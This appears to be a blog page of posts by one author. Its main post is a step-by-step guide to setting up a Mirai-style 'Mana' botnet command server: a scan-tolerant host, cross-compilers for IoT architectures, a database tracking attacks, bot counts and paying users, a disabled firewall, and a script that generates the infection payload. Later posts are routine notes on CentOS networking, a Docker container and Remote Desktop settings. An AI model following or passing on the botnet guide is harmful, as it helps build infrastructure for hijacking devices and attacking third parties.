Articles posted by loe

==========================================================

            Preparation before building a botnet
  1. At least 2 CPU cores, 8 GB RAM, a 1 Gbit port, and a provider that tolerates scanning
  2. Install Linux: CentOS 6.5 64-bit
  3. Download MobaXterm (https://mobaxterm.mobatek.net/download.html)
  4. Download PuTTY (https://www.chiark.greenend.org.uk/~sgtatham/putty/)
  5. Have the JS archive ready
  6. Have the bot list ready

==========================================================

  1. Connect to the server over SSH with MobaXterm

Enter the following commands
yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y
ln -s /usr/lib64/libgmp.so.3 /usr/lib64/libgmp.so.10
wget http://repo.mysql.com/mysql-community-release-el7-5.noarch.rpm
rpm -ivh mysql-community-release-el7-5.noarch.rpm
yum install mysql-server -y


mkdir /etc/xcompile
cd /etc/xcompile
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 --no-check-certificate
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 --no-check-certificate
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2 --no-check-certificate
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2 --no-check-certificate
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
rm -rf *.tar.bz2
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
cd /tmp
wget https://dl.google.com/go/go1.13.5.linux-amd64.tar.gz --no-check-certificate
tar -xvf go1.13.5.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords

【End of step 1 commands】
  1. Once the edits are done, select all the files and drag them into MobaXterm, into the /root directory on your server

4. Enter the following commands

service mysqld start
mysql_secure_installation   # the default root password is empty

5. Enter the following command

mysql -u root -proot
The password is passed inline with -p (root here); if you chose a different one during mysql_secure_installation, use that instead.

6. Enter the following commands

【6. Copy the following commands】

use mysql
GRANT ALL ON *.* TO root@'%' IDENTIFIED BY 'root';
FLUSH PRIVILEGES;

CREATE DATABASE Mana;
use Mana;
CREATE TABLE history (
id int(10) unsigned NOT NULL AUTO_INCREMENT,
user_id int(10) unsigned NOT NULL,
time_sent int(10) unsigned NOT NULL,
duration int(10) unsigned NOT NULL,
command text NOT NULL,
max_bots int(11) DEFAULT '-1',
PRIMARY KEY (id),
KEY user_id (user_id)
);

CREATE TABLE users (
id int(10) unsigned NOT NULL AUTO_INCREMENT,
username varchar(32) NOT NULL,
password varchar(32) NOT NULL,
duration_limit int(10) unsigned DEFAULT NULL,
cooldown int(10) unsigned NOT NULL,
wrc int(10) unsigned DEFAULT NULL,
last_paid int(10) unsigned NOT NULL,
max_bots int(11) DEFAULT '-1',
admin int(10) unsigned DEFAULT '0',
intvl int(10) unsigned DEFAULT '30',
api_key text,
PRIMARY KEY (id),
KEY username (username)
);

CREATE TABLE whitelist (
id int(10) unsigned NOT NULL AUTO_INCREMENT,
prefix varchar(16) DEFAULT NULL,
netmask tinyint(3) unsigned DEFAULT NULL,
PRIMARY KEY (id),
KEY prefix (prefix)
);
INSERT INTO users VALUES (NULL, 'root', 'root', 0, 0, 0, 0, -1, 1, 30, '');

CREATE TABLE logins (
id int(11) NOT NULL,
username varchar(32) NOT NULL,
action varchar(32) NOT NULL,
ip varchar(15) NOT NULL,
timestamp timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
exit;

【End of step 6 commands】
  1. Enter the following commands

    service iptables stop
    service httpd restart
    service mysqld restart

  2. Enter the following commands

    cd ~/
    chmod 0777 * -R
    sh build.sh

  3. Enter the following command

    nano /usr/include/bits/typesizes.h

    Scroll down to find "1024" and change it to "999999"
    Press Ctrl+X, then Y to save, then Enter to return to the prompt

  4. Enter the following command

    screen ./ui

    After you run it the screen goes blank and highlighted text appears; press Ctrl+A, then D
    [detached] is displayed,
    which means the setup succeeded

  1. Run PuTTY, enter the IP address and port 1791, select Raw, and open
    Type long and press Enter
    Enter the login username and password

python ManaPayload.py

Copy everything after "Payload:" and paste it onto your new server

There are two ways to give CentOS 7 an IP address: 1) obtain one dynamically over DHCP; 2) configure a static IP address.

Before configuring the network, find out the name of the network interface. CentOS 7 no longer installs ifconfig by default (it lives in the net-tools package); use ip addr instead. In the screenshot the interface is called ens32 and has no IP address yet.

1. Obtaining an IP dynamically (this assumes DHCP is enabled on your router)

Edit the interface configuration file: vi /etc/sysconfig/network-scripts/ifcfg-ens32 (the suffix is the interface name)

Only two settings need to change for DHCP. Note that ifcfg keys are upper-case: the file is read as shell-style KEY=value by the network scripts and NetworkManager, so a lower-case bootproto= would be ignored.

(1) BOOTPROTO=dhcp

(2) ONBOOT=yes

nmcli c reload            # reload the connection profiles
nmcli d connect bond0     # replace bond0 with your interface name; brings it up immediately

After the edit, restart the network service.

Dynamic addressing is now configured. Run ip addr again and the interface shows the address it obtained, and the host can reach the Internet (ping baidu.com).

2. Configuring a static IP address

A static address is configured much like the dynamic case, by editing the same interface file: vi /etc/sysconfig/network-scripts/ifcfg-ens32 (the suffix is the interface name)

(1) BOOTPROTO=static

(2) ONBOOT=yes

(3) Append the IP address, netmask, gateway and DNS servers:

IPADDR=192.168.1.160
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
DNS1=223.5.5.5
DNS2=223.6.6.6

(4) Restart the network service

nmcli c reload            # reload the connection profiles
nmcli d connect bond0     # replace bond0 with your interface name; brings it up immediately

A single DNS server is enough; I used two public resolvers. Check the IP address and test connectivity.
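The DHCP and static procedures above, as an added example that is not part of the original article: a small POSIX shell script that renders the ifcfg file from the values you would otherwise type by hand and validates them first (a malformed or non-contiguous NETMASK is a common reason a static configuration comes up without a working route). The interface name ens32 and the 192.168.1.0/24 values are the article's own; the function names are mine, and the script only prints the file, leaving the write to /etc/sysconfig/network-scripts/ and the nmcli reload to the operator.

```sh
#!/bin/sh
# Added example, not from the original article: render a CentOS 7
# ifcfg-<iface> file for DHCP or static addressing, checking the values
# first. Writing the file and reloading NetworkManager is left to the
# caller (see the usage comment at the bottom). Interface ens32 and the
# 192.168.1.x values come from the article; the function names are mine.
set -eu

# Return 0 if $1 is a well-formed dotted-quad IPv4 address.
valid_ipv4() {
  local ip=$1 IFS=. o n=0
  # Reject anything except digits and dots, and leading/trailing/doubled dots.
  case $ip in ''|*[!0-9.]*|.*|*.|*..*) return 1;; esac
  for o in $ip; do
    case $o in 0?*) return 1;; esac      # no leading zeros (they would parse as octal)
    [ "$o" -le 255 ] || return 1
    n=$((n + 1))
  done
  [ "$n" -eq 4 ]
}

# Convert a dotted netmask (255.255.255.0) to a prefix length (24).
# Fails on masks that are not a run of ones followed by zeros (255.0.255.0).
netmask_to_prefix() {
  local mask=$1 oldifs=$IFS m bits=0
  valid_ipv4 "$mask" || return 1
  IFS=.; set -- $mask; IFS=$oldifs
  m=$(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
  # For a contiguous mask, m OR (m - 1) sets every bit; 0.0.0.0 is rejected.
  [ "$m" -ne 0 ] && [ $(( m | (m - 1) )) -eq $((0xFFFFFFFF)) ] || return 1
  while [ $(( m & 0x80000000 )) -ne 0 ]; do
    bits=$((bits + 1))
    m=$(( (m << 1) & 0xFFFFFFFF ))
  done
  echo "$bits"
}

# Print an ifcfg file to stdout.
#   render_ifcfg dhcp   <iface>
#   render_ifcfg static <iface> <ip> <netmask> <gateway> <dns1> [dns2]
# Keys are upper-case: the file is read as shell-style KEY=value, so a
# lower-case bootproto=dhcp would simply be ignored.
render_ifcfg() {
  local mode=${1:-} iface=${2:-} ip=${3:-} mask=${4:-} gw=${5:-} dns1=${6:-} dns2=${7:-} prefix body
  [ -n "$iface" ] || return 1
  case $mode in
    dhcp)
      body='BOOTPROTO=dhcp'
      ;;
    static)
      valid_ipv4 "$ip" && valid_ipv4 "$gw" && valid_ipv4 "$dns1" || return 1
      prefix=$(netmask_to_prefix "$mask") || return 1
      # NETMASK is what the article uses; PREFIX is the equivalent CIDR form.
      body=$(printf 'BOOTPROTO=static\nIPADDR=%s\nNETMASK=%s\nPREFIX=%s\nGATEWAY=%s\nDNS1=%s' \
        "$ip" "$mask" "$prefix" "$gw" "$dns1")
      if [ -n "$dns2" ]; then
        valid_ipv4 "$dns2" || return 1
        body="$body
DNS2=$dns2"
      fi
      ;;
    *)
      return 1
      ;;
  esac
  printf 'TYPE=Ethernet\nNAME=%s\nDEVICE=%s\nONBOOT=yes\n%s\n' "$iface" "$iface" "$body"
}

# To apply on a real host (as root), then reload and connect as the article does:
#   render_ifcfg static ens32 192.168.1.160 255.255.255.0 192.168.1.1 223.5.5.5 223.6.6.6 \
#     > /etc/sysconfig/network-scripts/ifcfg-ens32
#   nmcli c reload && nmcli d connect ens32
```

Redirecting the output straight into the ifcfg file is the same as typing it in vi, with the difference that a bad octet or a non-contiguous mask is refused before anything is written.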

1. First install Docker from the 宝塔 (BT) panel

2. Then log in over SSH and pull the qinglong image

docker pull whyour/qinglong:latest

3. Start the container

Ordinary server. Note that -p 5700:5700 publishes the panel on every host interface, and traffic to a Docker-published port is DNAT'd into the container and traverses the FORWARD chain rather than INPUT, so host firewall rules written for INPUT do not shield it; if the panel should only be reached through a reverse proxy, bind it to loopback instead (-p 127.0.0.1:5700:5700).

docker run -dit \
-v $PWD/ql/config:/ql/config \
-v $PWD/ql/log:/ql/log \
-v $PWD/ql/db:/ql/db \
-p 5700:5700 \
--name qinglong \
--hostname qinglong \
--restart always \
whyour/qinglong:latest


N1 router and similar devices (host networking: the container shares the host's network namespace, so no -p mapping is needed and port 5700 is reachable on every host interface)

docker run -dit \
-v $PWD/ql/config:/ql/config \
-v $PWD/ql/log:/ql/log \
-v $PWD/ql/db:/ql/db \
--net host \
--name qinglong \
--hostname qinglong \
--restart always \
whyour/qinglong:latest




In Windows Firewall, under Inbound Rules, find the Remote Desktop "TCP-In" rule and enable it (the screenshots show this step).

Finally set the Group Policy: Computer Configuration -----> Administrative Templates -----> Network -----> Network Connections -----> Windows Firewall -----> Standard Profile -----> "Windows Firewall: Allow inbound Remote Desktop exceptions", and set it to Enabled.
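The two settings above (the inbound firewall rule and the Group Policy) can be verified from an elevated PowerShell prompt on the host. This is an added example, not part of the original page: the Terminal Server registry key and the NetSecurity cmdlets are documented, while the policy path under HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\Services\RemoteDesktop is my assumption of where the legacy "Allow inbound Remote Desktop exceptions" policy is written.

```powershell
# Added example (not part of the original page): report the RDP exposure that
# the firewall rule and Group Policy above produce. Run elevated on the host.
# The Terminal Server key and NetSecurity cmdlets are documented; the policy
# registry path is an assumption about where the legacy policy is stored.

function Get-RdpExposure {
    $r = [ordered]@{}

    # 1. Is Remote Desktop enabled? fDenyTSConnections = 0 means connections are allowed.
    $ts = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections
    $r.RdpEnabled = ($ts.fDenyTSConnections -eq 0)

    # 2. Built-in "Remote Desktop" inbound rules (including the TCP-In rule) and their state.
    $rules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound
    $r.InboundRules = ($rules | ForEach-Object { "$($_.DisplayName)=$($_.Enabled)" }) -join '; '
    $enabled = @($rules | Where-Object { $_.Enabled -eq 'True' })
    $r.AnyRuleEnabled = $enabled.Count -gt 0

    # 3. Remote addresses the enabled rules accept; 'Any' means the whole Internet on an exposed host.
    $r.RuleRemoteAddresses = ($enabled | Get-NetFirewallAddressFilter |
        ForEach-Object RemoteAddress | Sort-Object -Unique) -join ', '

    # 4. Is the RDP listener actually up on the default port?
    $r.Listening3389 = [bool](Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue)

    # 5. Legacy policy (assumed path): Enabled=1 plus the remote-address scope it grants.
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\Services\RemoteDesktop'
    if (Test-Path $policyKey) {
        $p = Get-ItemProperty $policyKey
        $r.PolicyEnabled = ($p.Enabled -eq 1)
        $r.PolicyRemoteAddresses = $p.RemoteAddresses
    } else {
        $r.PolicyEnabled = $false
        $r.PolicyRemoteAddresses = $null
    }

    [pscustomobject]$r
}

Get-RdpExposure | Format-List
```

If RuleRemoteAddresses or PolicyRemoteAddresses comes back as Any on an Internet-facing machine, scope the rule (or the policy's remote address list) to the management network before leaving the setting enabled.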